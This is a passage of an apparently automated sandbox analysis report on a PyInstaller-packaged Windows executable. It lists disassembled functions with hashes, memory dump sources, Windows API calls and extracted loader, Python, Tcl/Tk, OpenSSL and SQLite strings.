                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 52313D3761CB8186DB608F29E8402AE73A4FB88758F540139EB9D83BA5EF38D555CB00
                                                                                                                                                                                                                                              Function 00007FFE00761CBC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 292COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: ..\s\ssl\statem\statem_srvr.c$construct_stateful_ticket$resumption$tls_construct_new_session_ticket
                                                                                                                                                                                                                                              • API String ID: 0-1194634662
                                                                                                                                                                                                                                              • Opcode ID: d7c51ff00aa3bb62bc4b7c529fdc1557d19d858cb9888e3d1740cde6f66a3c2f
                                                                                                                                                                                                                                              • Instruction ID: f997f149aa84e96b7a774a2fb3f15b3d23fb55bfb8fb4152f15a769ba805ea96
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d7c51ff00aa3bb62bc4b7c529fdc1557d19d858cb9888e3d1740cde6f66a3c2f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EFD17E21B0E68281EB14AB65D8547B967A0FB85B84F4C4036EF8D4BBAEDE3DE541C710
                                                                                                                                                                                                                                              Function 00007FF6B7521874 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2227656907-0
                                                                                                                                                                                                                                              • Opcode ID: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
                                                                                                                                                                                                                                              • Instruction ID: e0dc1134c1ede4e01cd5a65e05e741f536f6f00a3cfd438340bcb22d5fea85c2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8CB1B423B1C69241EA61DF2A99002BA63A1EF44BE4F545131EF5D9BBE5EF3CE841C300
                                                                                                                                                                                                                                              Function 00007FFE00761EE2 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 470COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                                              • String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_psk
                                                                                                                                                                                                                                              • API String ID: 3568877910-3130753023
                                                                                                                                                                                                                                              • Opcode ID: bb6fdb0651d5f52247cd78fcf81d5255b842004060db7846350dbb3ed1d0d898
                                                                                                                                                                                                                                              • Instruction ID: 6c549e20a35669ffae189c731095f5df337004ead705dc4098add03d466f91af
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb6fdb0651d5f52247cd78fcf81d5255b842004060db7846350dbb3ed1d0d898
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D112B562A0EA8281FB61BB65D4543BD67A1FF81784F488032DF8D57BADDE7CE9418700
                                                                                                                                                                                                                                              Function 00007FF6B7525E7C Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF6B7525EAA
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B75255F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B752560C
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF6B7525EBB
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7525598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B75255AC
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF6B7525ECC
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B75255C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B75255DC
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B751A948: HeapFree.KERNEL32(?,?,?,00007FF6B7522D22,?,?,?,00007FF6B7522D5F,?,?,00000000,00007FF6B7523225,?,?,?,00007FF6B7523157), ref: 00007FF6B751A95E
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B751A948: GetLastError.KERNEL32(?,?,?,00007FF6B7522D22,?,?,?,00007FF6B7522D5F,?,?,00000000,00007FF6B7523225,?,?,?,00007FF6B7523157), ref: 00007FF6B751A968
                                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6B752610C), ref: 00007FF6B7525EF3
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3458911817-0
                                                                                                                                                                                                                                              • Opcode ID: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
                                                                                                                                                                                                                                              • Instruction ID: c97ae06fdf2f689c01fc93bfbba8d2e3fb59e61bf1d702adbaa5a3a2cea08dfb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FC514C33A1C64286E720DF29D8815B97761FB88794F414136EB4EC7AB6DF3CE4518740
                                                                                                                                                                                                                                              Function 00007FFE0131C380 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 377COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: $recovered %d frames from WAL file %s
                                                                                                                                                                                                                                              • API String ID: 0-3175670447
                                                                                                                                                                                                                                              • Opcode ID: e5641cb21486a6acf6a1fe0ade8eb86be90981cbbdf825e132ca60860199bf83
                                                                                                                                                                                                                                              • Instruction ID: c6f3bbad9e7c62c9e0c727fac651ed0132b329f2bd5091d2040c6fa6bcb43c97
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e5641cb21486a6acf6a1fe0ade8eb86be90981cbbdf825e132ca60860199bf83
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66F18E36A08786CAE7649F25E08076E77A1F784B98F025135DE5D8BBA8DF7CD844CB40
                                                                                                                                                                                                                                              Function 00007FFE007624DC Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 329COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                                              • String ID: ..\s\ssl\statem\extensions_clnt.c$tls_construct_ctos_psk
                                                                                                                                                                                                                                              • API String ID: 3568877910-446233508
                                                                                                                                                                                                                                              • Opcode ID: 7fb5678b9f67f08e663784aae6565b9e065ad5c58e2e1987a57ae2b77471c9e7
                                                                                                                                                                                                                                              • Instruction ID: c8ecf4e572a5d1acf18f77e8536214048f5034be0b7d2db2cc7e4ca5478d5127
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7fb5678b9f67f08e663784aae6565b9e065ad5c58e2e1987a57ae2b77471c9e7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6AD163A1B0E68381FA60BA22D5507BA5295EF84BC4F5C0031DF4E47BAEDF3DE6818751
                                                                                                                                                                                                                                              Function 00007FF6B7505830 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B7505840
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B7505852
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B7505889
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B750589B
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B75058B4
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B75058C6
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B75058DF
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B75058F1
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B750590D
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B750591F
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B750593B
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B750594D
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B7505969
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B750597B
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B7505997
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B75059A9
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B75059C5
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF6B75064CF,?,00007FF6B750336E), ref: 00007FF6B75059D7
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                              • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                              • API String ID: 199729137-653951865
                                                                                                                                                                                                                                              • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                              • Instruction ID: 51059412cc8c27bda031adb8049a171a26fb45d4a4ab3af1fd8e4184feb329f4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2022C367A0DB0792FB56DB5DA824AB423B0FF04789F645039CB5E822B1FF3CB5589244
                                                                                                                                                                                                                                              Function 00007FF6B75076C0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                              • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                              • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                              • Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                              • Instruction ID: afbf8e44049606493b6a61ad48ef1a32b219ed5e998c9ce3becdb61ddd17fc57
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9202E66AE0DB0B91FE169B5CE8149B423B5BF04789F540439CB6E822B4FF3CB55AD250
                                                                                                                                                                                                                                              Function 00007FF6B75081D0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7509390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6B75045F4,00000000,00007FF6B7501985), ref: 00007FF6B75093C9
                                                                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(?,00007FF6B75086B7,?,?,00000000,00007FF6B7503CBB), ref: 00007FF6B750822C
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7502810: MessageBoxW.USER32 ref: 00007FF6B75028EA
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                              • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                              • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                              • Opcode ID: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
                                                                                                                                                                                                                                              • Instruction ID: 64c9254f4cc18c1062e46c0276ede67bee28ea1b66b377b9b023a1583293e9f1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 24519313A2CA8781FA619B2DE851AFA63A0AF94788F444435DB4ED36F5EE3CF5048740
                                                                                                                                                                                                                                              Function 00007FF6B7501600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                              • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                              • Opcode ID: 2e06f33cb789c1c4285bc897e82d473ee5f193417d7b5bbbaceb79e5ee1fa664
                                                                                                                                                                                                                                              • Instruction ID: 1c666878ca6cd65b34c36de1c7d6d3058427205002bf00e49484db3ad9b5a93f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e06f33cb789c1c4285bc897e82d473ee5f193417d7b5bbbaceb79e5ee1fa664
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD519D63B0C64782EA10AB6994001B963A0BF84798F844535EF4CC7BF6EE3CF685C301
                                                                                                                                                                                                                                              Function 00007FFE00775880 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 101COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
